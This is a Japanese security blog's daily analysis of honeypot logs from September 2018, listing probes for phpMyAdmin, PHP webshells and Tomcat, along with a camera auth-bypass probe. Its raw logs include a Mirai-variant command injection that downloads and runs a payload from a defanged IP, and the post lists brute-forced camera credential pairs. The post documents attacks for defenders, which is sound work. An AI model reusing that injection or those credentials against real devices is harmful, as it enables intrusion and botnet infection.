S-Owl

S(ecurity)Owl

トップ > honeypot > ハニーポットのログ分析(2018/09/09)

ハニーポットのログ分析(2018/09/09)

honeypot

WOWhoneypotの2018/09/09(日) (運用96日目)の簡易分析です。
本日の総アクセス件数は 654件です。以下が全アクセスログです。

52 2018-09-09 GET /manager/html
28 2018-09-09 GET /
10 2018-09-09 POST /qq.php
8 2018-09-09 GET /web/phpMyAdmin/index.php
8 2018-09-09 GET /tools/phpMyAdmin/index.php
8 2018-09-09 GET /cmd.php
7 2018-09-09 GET /www/phpMyAdmin/index.php
7 2018-09-09 GET /phpMyAdmin/phpMyAdmin/index.php
7 2018-09-09 GET /claroline/phpMyAdmin/index.php
6 2018-09-09 POST /xx.php
6 2018-09-09 POST /s.php
6 2018-09-09 POST /q.php
6 2018-09-09 GET /tmpfs/snap.jpg
6 2018-09-09 GET /phpMyAdmin/index.php
5 2018-09-09 GET /shell.php
5 2018-09-09 GET /lala-dpr.php
5 2018-09-09 GET /knal.php
5 2018-09-09 GET /appserv.php
4 2018-09-09 POST /yao.php
4 2018-09-09 POST /xw1.php
4 2018-09-09 POST /wp-admins.php
4 2018-09-09 POST /webslee.php
4 2018-09-09 POST /sheep.php
4 2018-09-09 POST /qaq.php
4 2018-09-09 POST /phpStudy.php
4 2018-09-09 POST /pe.php
4 2018-09-09 POST /mx.php
4 2018-09-09 POST /lindex.php
4 2018-09-09 POST /hm.php
4 2018-09-09 POST /defect.php
4 2018-09-09 POST /db.init.php
4 2018-09-09 POST /db__.init.php
4 2018-09-09 POST /db_desql.php
4 2018-09-09 POST /db_dataml.php
4 2018-09-09 POST /conflg.php
4 2018-09-09 POST /cainiao.php
4 2018-09-09 POST /ak48.php
4 2018-09-09 POST /ak47.php
4 2018-09-09 POST /9678.php
4 2018-09-09 GET /xampp/phpmyadmin/index.php
4 2018-09-09 GET /wpo.php
4 2018-09-09 GET /wp-config.php
4 2018-09-09 GET /webdav/
4 2018-09-09 GET /text.php
4 2018-09-09 GET /test.php
4 2018-09-09 GET /pmd/index.php
4 2018-09-09 GET /pma-old/index.php
4 2018-09-09 GET /pmamy/index.php
4 2018-09-09 GET /pmamy2/index.php
4 2018-09-09 GET /PMA/index.php
4 2018-09-09 GET /PMA2/index.php
4 2018-09-09 GET /phpmyadmin/phpmyadmin/index.php
4 2018-09-09 GET /phpMyAdminold/index.php
4 2018-09-09 GET /phpMyAdmin.old/index.php
4 2018-09-09 GET /phpmyadmin-old/index.php
4 2018-09-09 GET /phpmyadmin/index.php
4 2018-09-09 GET /phpmyadmin2/index.php
4 2018-09-09 GET /phpmyadmin1/index.php
4 2018-09-09 GET /phpmyadmin0/index.php
4 2018-09-09 GET /phpma/index.php
4 2018-09-09 GET /myadmin/index.php
4 2018-09-09 GET /muhstiks.php
4 2018-09-09 GET /muhstik-dpr.php
4 2018-09-09 GET /muhstik2.php
4 2018-09-09 GET /lol.php
4 2018-09-09 GET /log.php
4 2018-09-09 GET /logon.php
4 2018-09-09 GET /java.php
4 2018-09-09 GET /hell.php
4 2018-09-09 GET /desktop.ini.php
4 2018-09-09 GET /db_pma.php
4 2018-09-09 GET /db_cts.php
4 2018-09-09 GET /admin/PMA/index.php
4 2018-09-09 GET /admin/pma/index.php
4 2018-09-09 GET /admin/phpMyAdmin/index.php
4 2018-09-09 GET /admin/phpmyadmin/index.php
4 2018-09-09 GET /admin/phpmyadmin2/index.php
4 2018-09-09 GET /admin/mysql2/index.php
3 2018-09-09 POST /zuo.php
3 2018-09-09 POST /xiao.php
3 2018-09-09 POST /wuwu11.php
3 2018-09-09 POST /wshell.php
3 2018-09-09 POST /w.php
3 2018-09-09 POST /wc.php
3 2018-09-09 POST /test.php
3 2018-09-09 POST /system.php
3 2018-09-09 POST /phpstudy.php
3 2018-09-09 POST /feixiang.php
3 2018-09-09 POST /db_session.init.php
3 2018-09-09 POST /bak.php
3 2018-09-09 POST /aotu.php
3 2018-09-09 GET /z.php
3 2018-09-09 GET /typo3/phpmyadmin/index.php
3 2018-09-09 GET /_query.php
3 2018-09-09 GET /pmd_online.php
3 2018-09-09 GET /pma/index.php
3 2018-09-09 GET /phpMyadmin_bak/index.php
3 2018-09-09 GET /phpadmin/index.php
3 2018-09-09 GET /mysql/index.php
3 2018-09-09 GET /mysqladmin/index.php
3 2018-09-09 GET /myadmin2/index.php
3 2018-09-09 GET /muhstik.php
3 2018-09-09 GET /license.php
3 2018-09-09 GET /lala.php
3 2018-09-09 GET /index.php
3 2018-09-09 GET /help.php
3 2018-09-09 GET /db/index.php
3 2018-09-09 GET /cmx.php
3 2018-09-09 GET /cmv.php
3 2018-09-09 GET /cmdd.php
3 2018-09-09 GET /admin/mysql/index.php
3 2018-09-09 GET /admin/index.php
2 2018-09-09 PROPFIND /
2 2018-09-09 POST /zuoshou.php
2 2018-09-09 POST /zuoindex.php
2 2018-09-09 POST /zshmindex.php
2 2018-09-09 POST /yumo.php
2 2018-09-09 POST /xz.php
2 2018-09-09 POST /xw.php
2 2018-09-09 POST /xshell.php
2 2018-09-09 POST /xiaomar.php
2 2018-09-09 POST /xiaoma.php
2 2018-09-09 POST /xiaomae.php
2 2018-09-09 POST /weixiao.php
2 2018-09-09 POST /wcp.php
2 2018-09-09 POST /wan.php
2 2018-09-09 POST /wanan.php
2 2018-09-09 POST /tiandi.php
2 2018-09-09 POST /ss.php
2 2018-09-09 POST /ssaa.php
2 2018-09-09 POST /she.php
2 2018-09-09 POST /sean.php
2 2018-09-09 POST /qw.php
2 2018-09-09 POST /qwe.php
2 2018-09-09 POST /python.php
2 2018-09-09 POST /post.php
2 2018-09-09 POST /phpinfi.php
2 2018-09-09 POST /mz.php
2 2018-09-09 POST /m.php?pbid=open
2 2018-09-09 POST /min.php
2 2018-09-09 POST /miao.php
2 2018-09-09 POST /log.php
2 2018-09-09 POST /linuxse.php
2 2018-09-09 POST /l8.php
2 2018-09-09 POST /l7.php
2 2018-09-09 POST /l6.php
2 2018-09-09 POST /ip.php
2 2018-09-09 POST /infoo.php
2 2018-09-09 POST /hh.php
2 2018-09-09 POST /help.php
2 2018-09-09 POST /h1.php
2 2018-09-09 POST /fack.php
2 2018-09-09 POST /default.php
2 2018-09-09 POST /data.php
2 2018-09-09 POST /cmd.php
2 2018-09-09 POST /ceshi.php
2 2018-09-09 POST /caonma.php
2 2018-09-09 POST /boots.php
2 2018-09-09 POST /aw.php
2 2018-09-09 POST /app.php
2 2018-09-09 POST /angge.php
2 2018-09-09 POST /ak.php
2 2018-09-09 POST /aaaa.php
2 2018-09-09 POST /9510.php
2 2018-09-09 POST /56.php
2 2018-09-09 POST /3.php
2 2018-09-09 POST /12.php
2 2018-09-09 POST /1213.php
2 2018-09-09 GET /x.php
2 2018-09-09 GET /uploader.php
2 2018-09-09 GET /mysql-admin/index.php
2 2018-09-09 GET /help-e.php
2 2018-09-09 GET /dbadmin/index.php
1 2018-09-09 GET /system.ini?loginuse&loginpas
1 2018-09-09 GET /robots.txt
1 2018-09-09 GET /pc/account/login.aspx
1 2018-09-09 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://209.141.33.86/d%20-O%20-%3E%20/tmp/xb;sh%20/tmp/xb%27$
1 2018-09-09 GET /lindex.php

phpMyAdmin関連(181件)とphpのWebShellに対する調査・攻撃(558件)と/へのアクセスを除外したアクセス数です。

52 2018-09-09 GET /manager/html
6 2018-09-09 GET /tmpfs/snap.jpg
4 2018-09-09 GET /webdav/
1 2018-09-09 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://209.141.33[.]86/d%20-O%20-%3E%20/tmp/xb;sh%20/tmp/xb%27$
1 2018-09-09 GET /robots.txt
1 2018-09-09 GET /system.ini?loginuse&loginpas
1 2018-09-09 GET /pc/account/login.aspx 

 「/manager/html」はTomcatの管理ページに対するブルートフォース攻撃です。

「/tmpfs/snap.jpg」は初めてですが、INSTAR社のIN-5907HDネットワークカメラの管理ページに対するブルートフォース攻撃のようです。パスワードは以下のようなものが含まれていました。

sfoperator:acmicpc223950
admin:acmicpc223950
admin:960821
user:a82461230

「/login.cgi?cli=aa…」の本日のD-Linkの脆弱性を狙ったMirai亜種の攻撃は「User-Agent: Gemini/2.0」でした。久々です。

「/system.ini?loginuse&loginpas」 は初めてですが、Wireless IP Cammeraに対する認証をバイパスできる脆弱性を突く攻撃のようです。
以下を参考にしました。CVE-2017-8225 - Pre-Auth Info Leak (credentials) within the custom http server
http://r00tapple.hatenablog.com/entry/2017/08/12/050252
https://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html

「/pc/account/login.aspx」も初めてですが、調べてもあまりわかりませんでした。内容は以下です。

GET /pc/account/login.aspx HTTP/1.1
Host: ms-ok[.]com
Accept-Encoding: gzip, deflate
Connection: close

対象のパスで調べても、Host名で調べても、どちらも韓国語のサイトが出てきます。他の言語ではほぼ出てこないのが気になります。

 

本日のドメインでのアクセスは以下です。

3 GET /
1 GET /robots.txt

本日のハンティングログは以下です。Mirai亜種です。

1 2018-09-09 wget hxxp://209.141.33.86/d

以上です。